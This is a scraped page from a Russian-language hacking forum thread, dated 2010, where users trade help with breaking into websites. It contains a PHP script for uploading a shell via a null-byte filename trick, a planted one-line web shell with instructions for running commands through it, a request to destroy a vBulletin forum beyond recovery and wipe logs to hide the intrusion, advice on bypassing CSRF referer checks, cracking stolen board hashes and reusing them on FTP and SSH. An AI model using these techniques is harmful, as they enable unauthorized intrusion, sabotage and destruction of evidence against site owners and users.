HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14911  
Старый 28.08.2010, 20:29
k2b1~
Новичок
Регистрация: 17.06.2010
Сообщений: 0
Провел на форуме:
5094

Репутация: 0
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
учимся читать
on xz znaet magicu a otkuda znaet ekraniruetsya
 
Ответить с цитированием

  #14912  
Старый 28.08.2010, 21:08
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от budden  
budden said:
Подскажите, как передать ПОСТом нуль-байт, если форма аплоадит файл и значит enctype="multipart/form-data"?
Вот пример:
Код:
Code:

File:
Если передаю файл, и в тампер-дата дописываю к его имени %00 или \0 - они не интерпретируются как нуль-байт, а идут текстом. И файл получается с %00 или \0 в названии... Как быть?
Пробовал на CentOS, php5 - не работает, нуллбайт игнорируется и расширение .gif приписывается при MagicQuotes on и off

На винде работает при MagicQuotes Off

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$conte[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"--ololo\r\n"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$conte[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]'
Content-Disposition: form-data; name="myname"'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\r\n\r\n"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$conte[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]'
shell.php'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\x00"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$conte[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"--ololo\r\n"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$conte[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]'
Content-Disposition: form-data; name="picture"; filename="picture.jpg"'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$conte[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Type: image/jpeg\r\n\r\n"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$conte[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]$sh[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$conte[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"--ololo--\r\n"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]post[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'
http://host/script.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$conte[/COLOR][COLOR="#007700"]);

function[/COLOR][COLOR="#0000BB"]post[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cont[/COLOR][COLOR="#007700"]){

[/
COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]parse_url[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$respons[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$postsock[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fsockopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]80[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$errno[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$errstr[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]60[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$head[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"POST[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]HTTP/1.1\r\n"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$head[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Host:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]\r\n"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$head[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Connection: close\r\n"[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$head[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Length: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cont[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$head[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Type: multipart/form-data; boundary=ololo\r\n\r\n"[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$head[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]$cont[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$postsock[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$head[/COLOR][COLOR="#007700"]);

while(![/COLOR][COLOR="#0000BB"]feof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$postsock[/COLOR][COLOR="#007700"])){

[/
COLOR][COLOR="#0000BB"]$respons[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]fgets[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$postsock[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1024[/COLOR][COLOR="#007700"]);

}

[/
COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$postsock[/COLOR][COLOR="#007700"]);

return[/
COLOR][COLOR="#0000BB"]$respons[/COLOR][COLOR="#007700"];

}

[/
COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR] 
 
Ответить с цитированием

  #14913  
Старый 28.08.2010, 21:45
Kusto
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме:
7518056

Репутация: 1089


Отправить сообщение для Kusto с помощью ICQ
По умолчанию

Цитата:
Сообщение от Nightmarе  
Nightmarе said:
Если в скрипте стоит проверка реферера (защита от CSRF) её реально как нибудь обойти? Чисто с целью использовать CSRF запрос.
Если да, то подскажите как.
одиг из вариантов с помощью XSS отправить запрос с данной страници
 
Ответить с цитированием

  #14914  
Старый 28.08.2010, 23:36
Shadrin
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171

Репутация: 270
Отправить сообщение для Shadrin с помощью ICQ
По умолчанию

Вопрос есть доступ к базе ipb

Table: ibf_members_converge

Columns:

converge_email

converge_joined

converge_pass_hash

converge_pass_salt

как мне сопоставить хеши к иду или юзернейму?куда еще рыть?

в копирайтах вижу это

Powered By IP.Board © 2010 IPS, Inc.

спасибо за ответы
 
Ответить с цитированием

  #14915  
Старый 29.08.2010, 13:59
Pavel1987
Guest
Сообщений: n/a
Провел на форуме:
2420

Репутация: 0
По умолчанию

шелл для булки-4

Привет!

вроде бы читал много про уязвимости вбуллетина, зашел в админку и попробовал залить через модули шелл adminer (скачал с сайта). Но через поиск по справки выполнить запрос не получилось.

Потом добавил еще один модуль с одной строчкой system($_GET["cmd"]);

И через так www.xz.сom/forumpath/faq.php?cmd= попробовал выполнить запрос sql для тестового удаления юзера. Такая же байда(((

Подскажите, что делаю ни так?

Если кратко, то есть форум VBULLETIN-4 и админский доступ к нему. Нужно как то положить форум что бы он стал не восстановим.при этом желательно что бы следы взлома не были обнаружены типа ошибка бд и что то в этом роде, удалить логи как то надо короче.

что посоветуете? заранее спасибо за помощь
 
Ответить с цитированием

  #14916  
Старый 29.08.2010, 14:13
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от Pavel1987  
Pavel1987 said:
Привет!
вроде бы читал много про уязвимости вбуллетина, зашел в админку и попробовал залить через модули шелл adminer (скачал с сайта). Но через поиск по справки выполнить запрос не получилось.
Потом добавил еще один модуль с одной строчкой system($_GET["cmd"]);
И через так www.xz.сom/forumpath/faq.php?cmd= попробовал выполнить запрос sql для тестового удаления юзера. Такая же байда(((
Подскажите, что делаю ни так?
Если кратко, то есть форум VBULLETIN-4 и админский доступ к нему. Нужно как то положить форум что бы он стал не восстановим.при этом желательно что бы следы взлома не были обнаружены типа ошибка бд и что то в этом роде, удалить логи как то надо короче.
что посоветуете? заранее спасибо за помощь
www.xz.сom/forumpath/faq.php?cmd=command line commands

EX:www.xz.сom/forumpath/faq.php?cmd=ls -la
 
Ответить с цитированием

  #14917  
Старый 29.08.2010, 14:19
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от k2b1~  
k2b1~ said:
www.xz.сom/forumpath/faq.php?cmd=http://www.testtest.com/shell.txt
ili probiy wget esli wget default funksiya
что за бред? это не инклюд...
 
Ответить с цитированием

  #14918  
Старый 29.08.2010, 14:21
Pavel1987
Guest
Сообщений: n/a
Провел на форуме:
2420

Репутация: 0
По умолчанию

А комманд лайн - это что за команды? Через них форр повесить можно?)

Т.е sql никак не покатит? я проста хотел сделать drop таблицы со всеми настройками, ну а потом и с логами))
 
Ответить с цитированием

  #14919  
Старый 29.08.2010, 16:08
manerus
Новичок
Регистрация: 10.08.2009
Сообщений: 16
Провел на форуме:
27247

Репутация: 1
По умолчанию

вытащил хеши от админки, рашифровали, а они не подходят. В чём может быть причина!

могу скинуть линк в пм!
 
Ответить с цитированием

  #14920  
Старый 29.08.2010, 16:11
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Цитата:
Сообщение от manerus  
manerus said:
вытащил хеши от админки, рашифровали, а они не подходят. В чём может быть причина!
могу скинуть линк в пм!
админок может быть сколько угодно, поищу другую админку. может таблица была ЮЗЕРОВ, а не АДМИНОВ?

попробуй эти пассы к FTP, SSH...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ